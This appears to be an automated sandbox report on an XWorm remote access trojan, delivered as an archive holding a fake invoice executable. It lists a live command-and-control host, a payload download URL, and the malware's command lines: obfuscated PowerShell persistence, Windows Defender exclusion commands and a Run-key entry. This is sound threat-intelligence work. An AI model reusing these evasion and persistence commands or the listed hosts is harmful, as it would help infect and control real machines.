xworm | hxxps://files[.]catbox[.]moe/vbvhg6[.]lzh

Resubmissions

21-05-2024 03:26

240521-dy8pjage2w 10

21-05-2024 03:11

240521-dplteagb61 1

Analysis

max time kernel
246s
max time network
248s
platform
windows10-2004_x64
resource
win10v2004-20240508-en
resource tags

arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system
submitted
21-05-2024 03:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://files.catbox.moe/vbvhg6.lzh

Score

10^/10

xworm execution persistence rat trojan

Malware Config

Extracted

Family

xworm

futurist2.ddns.net:20506

Attributes

Install_directory
%LocalAppData%
install_file
XClient.exe

Signatures

Detect Xworm Payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/4376-113-0x0000000000400000-0x0000000000418000-memory.dmp	family_xworm

Xworm
Xworm is a remote access trojan written in C#.
trojan rat xworm
Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid process

4676 powershell.exe
6044 powershell.exe
4648 powershell.exe
5596 powershell.exe

pid	process
4676	powershell.exe
6044	powershell.exe
4648	powershell.exe
5596	powershell.exe

Drops startup file 2 IoCs

Processes:

MSBuild.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk	MSBuild.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk	MSBuild.exe

Executes dropped EXE 1 IoCs

Processes:

PROFORMA INVOICE IMG30003222466 EXPO SCAN_pdf.exe

pid process

5132 PROFORMA INVOICE IMG30003222466 EXPO SCAN_pdf.exe

pid	process
5132	PROFORMA INVOICE IMG30003222466 EXPO SCAN_pdf.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

MSBuild.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\XClient = "C:\\Users\\Admin\\AppData\\Local\\XClient.exe"	MSBuild.exe

Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

58 ip-api.com
Suspicious use of SetThreadContext 1 IoCs

Processes:

PROFORMA INVOICE IMG30003222466 EXPO SCAN_pdf.exe

description pid process target process

PID 5132 set thread context of 4376 5132 PROFORMA INVOICE IMG30003222466 EXPO SCAN_pdf.exe MSBuild.exe

flow	ioc
58	ip-api.com

description	pid	process	target process
PID 5132 set thread context of 4376	5132	PROFORMA INVOICE IMG30003222466 EXPO SCAN_pdf.exe	MSBuild.exe

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe

Modifies data under HKEY_USERS 2 IoCs

Processes:

chrome.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133607356078716271"	chrome.exe

Modifies registry class 1 IoCs

Processes:

chrome.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings chrome.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000_Classes\Local Settings	chrome.exe

Suspicious behavior: EnumeratesProcesses 57 IoCs

Processes:

chrome.exePowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeMSBuild.exechrome.exe

pid	process
3044	chrome.exe
3044	chrome.exe
3752	Powershell.exe
3752	Powershell.exe
3752	Powershell.exe
5596	powershell.exe
5596	powershell.exe
5596	powershell.exe
4676	powershell.exe
4676	powershell.exe
4676	powershell.exe
6044	powershell.exe
6044	powershell.exe
6044	powershell.exe
4648	powershell.exe
4648	powershell.exe
4648	powershell.exe
4376	MSBuild.exe
4376	MSBuild.exe
4376	MSBuild.exe
4376	MSBuild.exe
4376	MSBuild.exe
4376	MSBuild.exe
4376	MSBuild.exe
4376	MSBuild.exe
4376	MSBuild.exe
4376	MSBuild.exe
4376	MSBuild.exe
4376	MSBuild.exe
4376	MSBuild.exe
4376	MSBuild.exe
4376	MSBuild.exe
4376	MSBuild.exe
4376	MSBuild.exe
4376	MSBuild.exe
4376	MSBuild.exe
4376	MSBuild.exe
4376	MSBuild.exe
4376	MSBuild.exe
4376	MSBuild.exe
4376	MSBuild.exe
4376	MSBuild.exe
4376	MSBuild.exe
4376	MSBuild.exe
4376	MSBuild.exe
4376	MSBuild.exe
4376	MSBuild.exe
4376	MSBuild.exe
4376	MSBuild.exe
4376	MSBuild.exe
4376	MSBuild.exe
4376	MSBuild.exe
4376	MSBuild.exe
4376	MSBuild.exe
4376	MSBuild.exe
6016	chrome.exe
6016	chrome.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

Processes:

chrome.exe

pid process

3044 chrome.exe
3044 chrome.exe
3044 chrome.exe
3044 chrome.exe
3044 chrome.exe
3044 chrome.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

chrome.exe7zG.exe

description	pid	process
Token: SeShutdownPrivilege	3044	chrome.exe
Token: SeCreatePagefilePrivilege	3044	chrome.exe
Token: SeShutdownPrivilege	3044	chrome.exe
Token: SeCreatePagefilePrivilege	3044	chrome.exe
Token: SeShutdownPrivilege	3044	chrome.exe
Token: SeCreatePagefilePrivilege	3044	chrome.exe
Token: SeShutdownPrivilege	3044	chrome.exe
Token: SeCreatePagefilePrivilege	3044	chrome.exe
Token: SeShutdownPrivilege	3044	chrome.exe
Token: SeCreatePagefilePrivilege	3044	chrome.exe
Token: SeShutdownPrivilege	3044	chrome.exe
Token: SeCreatePagefilePrivilege	3044	chrome.exe
Token: SeShutdownPrivilege	3044	chrome.exe
Token: SeCreatePagefilePrivilege	3044	chrome.exe
Token: SeShutdownPrivilege	3044	chrome.exe
Token: SeCreatePagefilePrivilege	3044	chrome.exe
Token: SeShutdownPrivilege	3044	chrome.exe
Token: SeCreatePagefilePrivilege	3044	chrome.exe
Token: SeShutdownPrivilege	3044	chrome.exe
Token: SeCreatePagefilePrivilege	3044	chrome.exe
Token: SeShutdownPrivilege	3044	chrome.exe
Token: SeCreatePagefilePrivilege	3044	chrome.exe
Token: SeShutdownPrivilege	3044	chrome.exe
Token: SeCreatePagefilePrivilege	3044	chrome.exe
Token: SeShutdownPrivilege	3044	chrome.exe
Token: SeCreatePagefilePrivilege	3044	chrome.exe
Token: SeShutdownPrivilege	3044	chrome.exe
Token: SeCreatePagefilePrivilege	3044	chrome.exe
Token: SeShutdownPrivilege	3044	chrome.exe
Token: SeCreatePagefilePrivilege	3044	chrome.exe
Token: SeShutdownPrivilege	3044	chrome.exe
Token: SeCreatePagefilePrivilege	3044	chrome.exe
Token: SeShutdownPrivilege	3044	chrome.exe
Token: SeCreatePagefilePrivilege	3044	chrome.exe
Token: SeShutdownPrivilege	3044	chrome.exe
Token: SeCreatePagefilePrivilege	3044	chrome.exe
Token: SeShutdownPrivilege	3044	chrome.exe
Token: SeCreatePagefilePrivilege	3044	chrome.exe
Token: SeShutdownPrivilege	3044	chrome.exe
Token: SeCreatePagefilePrivilege	3044	chrome.exe
Token: SeShutdownPrivilege	3044	chrome.exe
Token: SeCreatePagefilePrivilege	3044	chrome.exe
Token: SeShutdownPrivilege	3044	chrome.exe
Token: SeCreatePagefilePrivilege	3044	chrome.exe
Token: SeShutdownPrivilege	3044	chrome.exe
Token: SeCreatePagefilePrivilege	3044	chrome.exe
Token: SeRestorePrivilege	5736	7zG.exe
Token: 35	5736	7zG.exe
Token: SeSecurityPrivilege	5736	7zG.exe
Token: SeSecurityPrivilege	5736	7zG.exe
Token: SeShutdownPrivilege	3044	chrome.exe
Token: SeCreatePagefilePrivilege	3044	chrome.exe
Token: SeShutdownPrivilege	3044	chrome.exe
Token: SeCreatePagefilePrivilege	3044	chrome.exe
Token: SeShutdownPrivilege	3044	chrome.exe
Token: SeCreatePagefilePrivilege	3044	chrome.exe
Token: SeShutdownPrivilege	3044	chrome.exe
Token: SeCreatePagefilePrivilege	3044	chrome.exe
Token: SeShutdownPrivilege	3044	chrome.exe
Token: SeCreatePagefilePrivilege	3044	chrome.exe
Token: SeShutdownPrivilege	3044	chrome.exe
Token: SeCreatePagefilePrivilege	3044	chrome.exe
Token: SeShutdownPrivilege	3044	chrome.exe
Token: SeCreatePagefilePrivilege	3044	chrome.exe

Suspicious use of FindShellTrayWindow 40 IoCs

Processes:

chrome.exe7zG.exe7zG.exe

pid	process
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
5736	7zG.exe
5952	7zG.exe
3044	chrome.exe
3044	chrome.exe

Suspicious use of SendNotifyMessage 26 IoCs

Processes:

chrome.exe

pid	process
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe
3044	chrome.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

MSBuild.exe

pid process

4376 MSBuild.exe

pid	process
4376	MSBuild.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

chrome.exe

description	pid	process	target process
PID 3044 wrote to memory of 4736	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 4736	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 1388	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 1388	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 1388	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 1388	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 1388	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 1388	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 1388	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 1388	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 1388	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 1388	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 1388	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 1388	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 1388	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 1388	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 1388	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 1388	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 1388	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 1388	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 1388	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 1388	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 1388	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 1388	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 1388	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 1388	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 1388	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 1388	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 1388	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 1388	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 1388	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 1388	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 1388	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 1580	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 1580	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 3380	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 3380	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 3380	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 3380	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 3380	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 3380	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 3380	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 3380	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 3380	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 3380	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 3380	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 3380	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 3380	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 3380	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 3380	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 3380	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 3380	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 3380	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 3380	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 3380	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 3380	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 3380	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 3380	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 3380	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 3380	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 3380	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 3380	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 3380	3044	chrome.exe	chrome.exe
PID 3044 wrote to memory of 3380	3044	chrome.exe	chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://files.catbox.moe/vbvhg6.lzh
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3044

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffeb03eab58,0x7ffeb03eab68,0x7ffeb03eab78
2⤵
PID:4736

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1580 --field-trial-handle=1956,i,11516391114652801787,16229297260636391320,131072 /prefetch:2
2⤵
PID:1388

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1936 --field-trial-handle=1956,i,11516391114652801787,16229297260636391320,131072 /prefetch:8
2⤵
PID:1580

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2256 --field-trial-handle=1956,i,11516391114652801787,16229297260636391320,131072 /prefetch:8
2⤵
PID:3380

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3060 --field-trial-handle=1956,i,11516391114652801787,16229297260636391320,131072 /prefetch:1
2⤵
PID:3164

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3068 --field-trial-handle=1956,i,11516391114652801787,16229297260636391320,131072 /prefetch:1
2⤵
PID:2368

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4636 --field-trial-handle=1956,i,11516391114652801787,16229297260636391320,131072 /prefetch:8
2⤵
PID:4204

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4892 --field-trial-handle=1956,i,11516391114652801787,16229297260636391320,131072 /prefetch:8
2⤵
PID:328

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4040 --field-trial-handle=1956,i,11516391114652801787,16229297260636391320,131072 /prefetch:8
2⤵
PID:4108

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4724 --field-trial-handle=1956,i,11516391114652801787,16229297260636391320,131072 /prefetch:8
2⤵
PID:5576

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --mojo-platform-channel-handle=4552 --field-trial-handle=1956,i,11516391114652801787,16229297260636391320,131072 /prefetch:1
2⤵
PID:3772

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --mojo-platform-channel-handle=4116 --field-trial-handle=1956,i,11516391114652801787,16229297260636391320,131072 /prefetch:1
2⤵
PID:212

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4664 --field-trial-handle=1956,i,11516391114652801787,16229297260636391320,131072 /prefetch:8
2⤵
PID:5764

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5204 --field-trial-handle=1956,i,11516391114652801787,16229297260636391320,131072 /prefetch:8
2⤵
PID:5768

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=5176 --field-trial-handle=1956,i,11516391114652801787,16229297260636391320,131072 /prefetch:1
2⤵
PID:4516

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=1548 --field-trial-handle=1956,i,11516391114652801787,16229297260636391320,131072 /prefetch:1
2⤵
PID:2848

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3356 --field-trial-handle=1956,i,11516391114652801787,16229297260636391320,131072 /prefetch:8
2⤵
PID:2112

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5400 --field-trial-handle=1956,i,11516391114652801787,16229297260636391320,131072 /prefetch:8
2⤵
PID:5144

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5432 --field-trial-handle=1956,i,11516391114652801787,16229297260636391320,131072 /prefetch:2
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:6016

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:4672

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=4120,i,11266875042087428226,16669718873272757238,262144 --variations-seed-version --mojo-platform-channel-handle=4084 /prefetch:8
1⤵
PID:2796

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:5656

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Downloads\" -an -ai#7zMap17746:74:7zEvent8627
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:5736

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" a -i#7zMap15642:152:7zEvent10723 -ad -saa -- "C:\Users\Admin\Downloads\PROFORMA INVOICE IMG30003222466 EXPO SCAN_pdf"
1⤵
- Suspicious use of FindShellTrayWindow
PID:5952

C:\Users\Admin\Downloads\PROFORMA INVOICE IMG30003222466 EXPO SCAN_pdf.exe
"C:\Users\Admin\Downloads\PROFORMA INVOICE IMG30003222466 EXPO SCAN_pdf.exe"
1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:5132

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe
"Powershell.exe" 東б屁एचтぎ儿ト丽-東б屁एचтぎ儿ト丽E東б屁एचтぎ儿ト丽x東б屁एचтぎ儿ト丽e東б屁एचтぎ儿ト丽c東б屁एचтぎ儿ト丽u東б屁एचтぎ儿ト丽t東б屁एचтぎ儿ト丽i東б屁एचтぎ儿ト丽o東б屁एचтぎ儿ト丽n東б屁एचтぎ儿ト丽P東б屁एचтぎ儿ト丽o東б屁एचтぎ儿ト丽l東б屁एचтぎ儿ト丽i東б屁एचтぎ儿ト丽c東б屁एचтぎ儿ト丽y東б屁एचтぎ儿ト丽東б屁एचтぎ儿ト丽B東б屁एचтぎ儿ト丽y東б屁एचтぎ儿ト丽p東б屁एचтぎ儿ト丽a東б屁एचтぎ儿ト丽s東б屁एचтぎ儿ト丽s東б屁एचтぎ儿ト丽東б屁एचтぎ儿ト丽-東б屁एचтぎ儿ト丽c東б屁एचтぎ儿ト丽o東б屁एचтぎ儿ト丽m東б屁एचтぎ儿ト丽m東б屁एचтぎ儿ト丽a東б屁एचтぎ儿ト丽n東б屁एचтぎ儿ト丽d 東б屁एचтぎ儿トC東б屁एचтぎ儿トo東б屁एचтぎ儿トp東б屁एचтぎ儿トy東б屁एचтぎ儿ト-東б屁एचтぎ儿トI東б屁एचтぎ儿トt東б屁एचтぎ儿トe東б屁एचтぎ儿トm 'C:\Users\Admin\Downloads\PROFORMA INVOICE IMG30003222466 EXPO SCAN_pdf.exe' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\windows.exe'
2⤵
- Suspicious behavior: EnumeratesProcesses
PID:3752

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
2⤵
- Drops startup file
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:4376

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe'
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:5596

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'MSBuild.exe'
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4676

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\XClient.exe'
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:6044

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'XClient.exe'
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4648

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\701ae866-b036-497b-8acb-6064e05e5c07.tmp

Filesize
98KB

MD5
8ce84a6425ffa5136368483f6492ca0c

SHA1
c3c3b05572105d56b9e5bb3da6b5c8f91e882844

SHA256
b85fd247836c96d253054f0efc05c072360167515a92bcdbb23a857280c93778

SHA512
203eddc0ba28c2888e801b5939eb60daa3065aa8bb64469f5b53b08dde01d329c512df256e473b0b1ec3f1c0b34ffd48e034817c32dff9d87880215ef6357c86

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000010

Filesize
204KB

MD5
